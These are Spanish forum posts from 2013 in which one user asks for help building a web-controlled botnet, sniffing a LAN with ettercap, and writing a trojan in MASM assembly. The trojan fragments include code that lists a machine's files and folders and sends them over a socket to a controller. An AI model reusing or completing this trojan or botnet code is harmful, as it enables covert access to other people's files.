|
872
|
Seguridad Informática / Análisis y Diseño de Malware / Troyanos con Cliente Web
|
en: 4 Agosto 2013, 05:43 am
|
Buenas amigos!! Hoy se me antojo programar un rato en plataforma web,, y que mejor que una especie de botnet? Bueno,, como ya sabrán algunos, la mayoría del hosting gratuito no ofrece sql remoto, ni sockets en php,, entonces pensé,, bueno, de alguna forma se tiene que poder! Si Zeus puede, yo también :p Alguien que me pueda dar una idea de como funciona la conexión entre cliente C++ y server web? Pd: Algunos pensaran que estoy equivocado con los términos cliente y server,, pero no se porque los suelen llamar al revés :/
|
|
|
873
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Expongamos opiniones de diseño :)
|
en: 4 Agosto 2013, 05:15 am
|
Jejejeje esta bueno tambien!! Al mejor estilo abstracto jajaja Saludos! PD: No he tenido tiempo ultimamente,, pero como dije antes,, este proyecto lo voy a terminar,, y a lo mejor, para cuando lo termine,, lo libero sin mas,, despues de todo, la idea es aprender
|
|
|
874
|
Seguridad Informática / Hacking Wireless / Duda con Wireshark
|
en: 1 Agosto 2013, 20:15 pm
|
Hola amigos del foro! Primero que nada, perdon si no deberia estar aca la consulta, y segundo que probablemente ya este aclarada esta misma duda en algun otro hilo, pero no lo he encontrado... Bueno, el asunto es que necesito sniffar mi red, solamente para aprender un poco de ese asunto :p El problema es que no se si se puede hacer como yo quiero,, yo me conecto a mi red por wifi desde una notebook,, la duda es.. se puede leer los paquetes que pasan por el router hacia otra pc que se conecta con cable? O sea,, algo asi es la red:
PC1 (conectada al router por cable) --> [ROUTER] <-- PC2 (conectada al router por wifi)
Podria la PC2 ver los paquetes de la PC1? Bueno,, eso nomas.. Si no se entiende lo trato de explicar mejor!! Gracias!! Saludos
EDITADO: Bien, leyendo un poco mas,, veo que si se puede.. con ettercap. Puede ser que este en lo correcto? De ser asi, alguna sugerencia? Algun buen tuto para los novatos..? Gracias!
|
|
|
877
|
Programación / ASM / Re: Principio de Troyano ASM
|
en: 29 Mayo 2013, 05:00 am
|
Gracias cpu2! Ahora lo intentare !! las constantes las declare para no escibir una y otra vez los valores mientras probaba como hacer funcionar esto que explicas con tanta naturalidad jajaja por otro lado,, es verdad, aun no domino el arte de los registros y el stack...hay cosas que aun no se pero mi experiencia dice: "Hacer y entender" ( Aunque un libro tampoco estaria mal en asm ) jajajaja Igual, juro que he leido! ( Hace 2 meses siquiera pensaba en programar en asm... ) Saludos!
|
|
|
879
|
Programación / ASM / Re: [Ayuda] Problema con funcion send y pisar datos
|
en: 28 Mayo 2013, 21:26 pm
|
Hola.. Perdon que respondo tan tarde, recien veo que no esta mi comentario anterior.. el problema ya esta resuelto.. Pongo la solucion: SFile WIN32_FIND_DATA <> (Estructura para busqueda de archivos) NoE db "MSG|Archivo no encontrado0", 0 EFile db "File|%s0", 0 EFold db "Fold|%s0", 0
ThreadBus proc FtoF:DWORD
invoke FindFirstFile, FtoF, addr SFile cmp eax, -1 je NoEncontrado mov Hand, eax
Buccle:
invoke FindNextFile, Hand, addr SFile cmp eax, 0 je Salida
cmp SFile.cFileName, PUNTO je Buccle
cmp SFile.dwFileAttributes, FILE_ATTRIBUTE_DIRECTORY jne Files ;Envio las carptas invoke wsprintf, addr Bufi, addr EFold, addr SFile.cFileName invoke send, Sock, addr Bufi, sizeof Bufi, 0 jmp Buccle
Files: ;Envio los archivos invoke wsprintf, addr Bufi, addr EFile, addr SFile.cFileName invoke send, Sock, addr Bufi, sizeof Bufi, 0 jmp Buccle
Salida: invoke FindClose, addr Hand jmp Fin
NoEncontrado: invoke send, Sock, addr NoE, sizeof NoE, 0
Fin:
ret ThreadBus endp
Justo ahora lo estoy por arreglar, porque funciona bastante bien, pero no es optimo del todo :p Esta funcion (ThreadBus) tiene que ser llamada como un thread para que funcione bien.. Saludos!
|
|
|
880
|
Programación / ASM / Re: Principio de Troyano ASM
|
en: 28 Mayo 2013, 07:26 am
|
Buenas señores! Primero que nada, perdon por volver a escribir en este post, pero no daba para empezar otro hilo.. ( me parece ) Estoy teniendo problemas para hacer el push de htoons y inet.. INET equ 0100007fh HTOONS equ 0b8220200h
Y luego ThreadProc PROC
invoke WSAStartup, addr Ver, addr wsa invoke socket, AF_INET, SOCK_STREAM, 0 mov sock, eax invoke WSAAsyncSelect, sock, hwnd, WM_SOCK, FD_CONNECT or FD_CLOSE or FD_READ mov sa.sin_family, AF_INET ;invoke inet_addr, addr szIp ;mov sa.sin_addr, eax ;Pusheo el valor de Inet
mov sa.sin_addr, INET push INET
;invoke htons, port ;mov sa.sin_port, ax ;Pusheo el valor de Htoons
mov ax, HTOONS push HTOONS
invoke connect, sock, addr sa, sizeof sa
ret ThreadProc ENDP
El problema es que cuando lo ejecuto funciona, pero me empieza a abrir este proceso: vsjitdebugger.exe infinitas veces, hasta que supongo yo, colapse la memoria Que puede estar pasando ? tendira que sacar de la pila despues que pusheo ? Gracias por leer !!
|
|
|
|
|
|
|